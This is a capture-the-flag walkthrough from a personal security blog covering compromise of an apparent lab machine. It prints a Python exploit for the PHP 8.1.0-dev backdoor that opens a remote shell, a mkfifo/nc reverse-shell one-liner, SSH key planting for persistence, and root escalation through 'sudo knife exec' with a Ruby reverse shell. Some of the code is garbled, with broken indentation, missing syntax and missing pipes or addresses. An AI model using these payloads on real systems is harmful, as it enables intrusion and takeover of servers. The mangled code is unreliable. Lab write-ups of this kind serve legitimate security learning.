Muzec's Cyber Security Blog

Hack. Sleep. Repeat

View on GitHub


We always start with an nmap scan…..

Nmap -sC -sV -oA nmap <Target-IP>

└─$ cat nmap.nmap            
# Nmap 7.91 scan initiated Sun May 23 16:18:08 2021 as: nmap -sC -sV -oA nmap
Nmap scan report for
Host is up (0.41s latency).
Not shown: 998 closed ports
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 be:54:9c:a3:67:c3:15:c3:64:71:7f:6a:53:4a:4c:21 (RSA)
|   256 bf:8a:3f:d4:06:e9:2e:87:4e:c9:7e:ab:22:0e:c0:ee (ECDSA)
|_  256 1a:de:a1:cc:37:ce:53:bb:1b:fb:2b:0b:ad:b3:f6:84 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title:  Emergent Medical Idea
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at .
# Nmap done at Sun May 23 16:19:40 2021 -- 1 IP address (1 host up) scanned in 91.65 seconds

We just have 2 open ports let hit it going to the web server which is on port 80 i find nothing spend hours here really.


Bursting directory but nothing so i try to run Nikto to see what am missing.


An early release of PHP, the PHP 8.1.0-dev version was released with a backdoor on March 28th 2021, but the backdoor was quickly discovered and removed. If this version of PHP runs on a server, an attacker can execute arbitrary code by sending the User-Agentt header.

The following exploit uses the backdoor to provide a pseudo system shell on the host.

#!/usr/bin/env python3
import os
import re
import requests

host = input("Enter the full host url:\n")
request = requests.Session()
response = request.get(host)

if str(response) == '<Response [200]>':
    print("\nInteractive shell is opened on", host, "\nCan't access tty; job crontol turned off.")
        while 1:
            cmd = input("$ ")
            headers = {
            "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0",
            "User-Agentt": "zerodiumsystem('" + cmd + "');"
            response = request.get(host, headers = headers, allow_redirects = False)
            current_page = response.text
            stdout = current_page.split('<!DOCTYPE html>',1)
            text = print(stdout[0])
    except KeyboardInterrupt:

    print("Host is not available, aborting...")

Now let save in a file for example i use now let run it.


And we have shell boom but it really a dumb shell let try to transfer it.

  1. Start an Ncat listener nc -nvlp 4444
  2. rm /tmp/f;mkfifo /tmp/f;cat /tmp/f /bin/sh -i 2>&1 nc 1234 >/tmp/f edit the port and IP

Now let run it on the dumb shell we have to get a new shell on our listener.


Spawning a TTY shell with ` python3 -c’import pty; pty.spawn (“/bin/bash”)’` and we are good now let get to the home directory to get the user.txt .


We have user.txt now let move to root seems we have the SSH folder.

Privilege Escalation

Now moving to the SSH folder we have the private key and the authorized_keys also with public key.


Going back to my machine i generated an SSH private and public key and add it to the authorized_keys of the target and also use the private key to SSH into the machine.


Now let log in.


We are in checking sudo -l cool seems we can run knife to get root.


Going through knife command options found something cool that can give us a reverse shell probably we just need to paly with it.

  1. sudo /usr/bin/knife exec


Since it in ruby we need to add a ruby script yes a reverse shell own we be cool.

  1. exit if fork;"","5555");loop{c.gets.chomp!;(exit! if $_=="exit");($_=~/cd (.+)/i?(Dir.chdir($1)):(IO.popen($_,?r){|io|c.print}))rescue c.puts "failed: #{$_}"}


Before running let start an Ncat listener.


Now to run it Ctrl+D and boom we should have shell in root.


Box rooted and we are done.


Greeting From Muzec

Back To Home